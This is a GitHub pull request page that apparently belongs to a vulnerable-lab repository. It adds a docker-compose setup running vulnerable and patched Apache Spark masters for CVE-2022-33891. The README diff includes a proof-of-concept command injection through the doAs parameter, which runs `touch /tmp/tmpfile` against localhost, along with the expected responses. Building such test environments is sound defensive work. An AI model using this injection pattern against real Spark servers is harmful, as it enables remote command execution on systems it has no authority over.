Skip to content

unified dockerfile for spark cve-2022-33891 #215

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
robert-doyensec wants to merge 1 commit into
base: main
Choose a base branch
from
+42 −23
Open

unified dockerfile for spark cve-2022-33891 #215

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
36 changes: 29 additions & 7 deletions apache/spark/CVE-2022-33891/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,11 +1,33 @@
Apache Spark CVE-2022-33891
# Apache Spark CVE-2022-33891

This directory contains the deployment config for Apache Spark. Versions earlier than 3.2.2 or 3.3.0 are vulnerable to this vulnerability.
This directory contains a docker compose file for Apache Spark which runs both safe and vulnerable versions. Versions earlier than 3.2.2 or 3.3.0 are vulnerable to this vulnerability.

The deployed service listens on port `8080`.
## Docker Compose
```
docker compose up
```
The vulnerable Spark instance will be at http://localhost:8081/ and the non-vulnerable Spark instance will be at http://localhost:8082/

## Vulnerable version
docker-compose -f vuln-docker-compose.yml up -d
### Vulnerable case
```
curl http://localhost:8081/?doAs=`touch%20/tmp/tmpfile`
```
Response:
```
...
<title>Error 403 User `touch /tmp/tmpfile` is not authorized to access this page.</title>
...
```
If you run `ls /tmp` from inside the container, `tmpfile` will be present.

## Fixed version
docker-compose -f fixed-docker-compose.yml up -d
### Safe case
```
curl http://localhost:8082/?doAs=`touch%20/tmp/tmpfile`
```
Response:
```
...
<title>Spark Master at spark://2997522835aa:7077</title>
...
```
The `tmpfile` will not be in `/tmp`.
16 changes: 13 additions & 3 deletions ...rk/CVE-2022-33891/vuln-docker-compose.yml → ...e/spark/CVE-2022-33891/docker-compose.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,8 +1,18 @@
version: '2'

services:
spark:
image: docker.io/bitnami/spark:3.1.1
spark-safe:
image: docker.io/bitnamilegacy/spark:3.2.4
environment:
- SPARK_MODE=master
- SPARK_RPC_AUTHENTICATION_ENABLED=no
- SPARK_RPC_ENCRYPTION_ENABLED=no
- SPARK_LOCAL_STORAGE_ENCRYPTION_ENABLED=no
- SPARK_SSL_ENABLED=no
ports:
- '8082:8080'
spark-vuln:
image: docker.io/bitnamilegacy/spark:3.1.1
entrypoint: ["/bin/bash", "-c", "echo \"spark.acls.enable true\" >> /opt/bitnami/spark/conf/spark-defaults.conf && /opt/bitnami/scripts/spark/entrypoint.sh && /opt/bitnami/scripts/spark/run.sh"]
environment:
- SPARK_MODE=master
Expand All @@ -11,4 +21,4 @@ services:
- SPARK_LOCAL_STORAGE_ENCRYPTION_ENABLED=no
- SPARK_SSL_ENABLED=no
ports:
- '8080:8080'
- '8081:8080'
13 changes: 0 additions & 13 deletions apache/spark/CVE-2022-33891/fixed-docker-compose.yml
View file
Open in desktop

This file was deleted.